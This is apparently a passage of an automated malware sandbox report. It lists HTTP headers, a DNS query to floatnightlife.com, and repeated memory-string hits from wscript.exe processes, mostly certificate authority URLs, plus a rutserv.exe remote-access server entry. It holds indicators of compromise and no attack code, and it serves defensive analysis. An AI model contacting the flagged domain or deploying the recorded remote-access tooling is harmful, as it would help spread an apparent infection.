  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic | DNS traffic detected: DNS query: floatnightlife.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningroo
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrust
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: rutserv.exe, 00000028.00000000.2442175532.0000000000A51000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://madExcept.comU
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
